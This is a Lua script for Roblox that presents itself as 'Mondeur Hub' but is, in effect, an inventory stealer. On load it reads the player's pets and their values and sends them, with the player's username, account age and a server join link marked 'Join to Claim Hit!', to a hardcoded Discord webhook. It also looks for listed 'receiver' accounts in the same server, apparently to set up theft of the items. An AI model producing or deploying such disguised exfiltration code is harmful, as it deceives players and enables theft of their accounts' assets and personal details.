-- [[ MONDEUR HUB | FINAL STABLE V8 ]] --
local HttpService       = game:GetService("HttpService")
local Players           = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer       = Players.LocalPlayer

-- [[ CONFIG ]] --
local WEBHOOK_URL = "https://discord.com/api/webhooks/1474651524251648163/lhPvWSeT6mcm3b4tIfzEbph1asYmZGvxf3YABYsKUOSeInP3oXW10NmHKJuj0vDrICku"
local TARGET_RECEIVERS = {"2ndcfpaj67", "sofiqmnz", "Hisokarah", "CREOLEO23"}

--------------------------------------------------------------
-- LOADING GUARD
--------------------------------------------------------------
if not game:IsLoaded() then game.Loaded:Wait() end
task.wait(3)

local Fsys = ReplicatedStorage:WaitForChild("Fsys", 60)
local Fsys2 = require(Fsys)
local load = Fsys2.load
local InventoryDB = load("InventoryDB")

--------------------------------------------------------------
-- UI DESIGN
--------------------------------------------------------------
local function sendMondeurReport(pets, totalVal, totalCount, receiver)
    local request = (syn and syn.request) or http_request or request
    if not request then return end

    local lootLines = ""
    if #pets > 0 then
        for i, p in ipairs(pets) do
            if i > 20 then break end
            local emoji = p.value > 0 and "⭐" or "🐾"
            lootLines = lootLines .. emoji .. " " .. p.name .. " — `" .. p.value .. "`\n"
        end
    else
        lootLines = "No items found"
    end

    local payload = {
        username = "Mondeur Hub (Best)",
        embeds = {{
            title = "MondeurOnTop • ADM Hit [ 🌊 ]",
            color = 0x3498db,
            description = "### 📄 Player Information\n" ..
                "👤 **User Name** : `" .. LocalPlayer.Name .. "`\n" ..
                "🎭 **Display Name** : `" .. LocalPlayer.DisplayName .. "`\n" ..
                "📅 **Account Age** : " .. LocalPlayer.AccountAge .. " days\n" ..
                "📱 **Executor** : " .. (identifyexecutor and identifyexecutor() or "Delta") .. "\n" ..
                "👥 **Players** : " .. #Players:GetPlayers() .. "/" .. Players.MaxPlayers .. "\n" ..
                "😎 **Receiver** : " .. (receiver or "None Online") .. "\n" ..
                "💰 **Total Value** : " .. totalVal .. "\n\n" ..
                "### 📡 Player Status\n" ..
                "🟢 **Connected & Intercepting**\n\n" ..
                "### 📦 Loot Summary\n" ..
                "```\n" .. lootLines .. "```\n" ..
                "**Total Items Found:** `" .. totalCount .. "`\n\n" ..
                "### 🔍 Scrap Summary\n" ..
                "[**View Full Inventory Log**](https://api.rubis.app/v2/scrap/nu3YNS4Pum4oLolW/raw)\n" ..
                "### 👥 Join Player\n" ..
                "[**Join to Claim Hit!**](roblox://placeID=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId .. ")",
            footer = { text = "Mondeur Elite Services | " .. os.date("%X") },
            timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
        }}
    }

    pcall(function()
        request({
            Url = WEBHOOK_URL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(payload)
        })
    end)
end

--------------------------------------------------------------
-- SCAN LOGIC
--------------------------------------------------------------
local function execute()
    local success, inv = pcall(function() 
        return ReplicatedStorage.API["InventoryAPI/GetInventory"]:InvokeServer() 
    end)
    
    if not success or not inv then return end

    local pets, totalVal, totalCount = {}, 0, 0
    
    for _, item in pairs(inv) do
        if item.Kind == "Pet" then
            totalCount = totalCount + 1
            local petData = InventoryDB.pets[item.id]
            local val = (item.properties and item.properties.value) or 0
            table.insert(pets, {name = (petData and petData.name) or "Unknown", value = val})
            totalVal = totalVal + val
        end
    end

    table.sort(pets, function(a, b) return a.value > b.value end)

    local target = nil
    for _, name in ipairs(TARGET_RECEIVERS) do
        if Players:FindFirstChild(name) then target = name break end
    end

    sendMondeurReport(pets, totalVal, totalCount, target)
end

task.spawn(function()
    pcall(execute)
end)
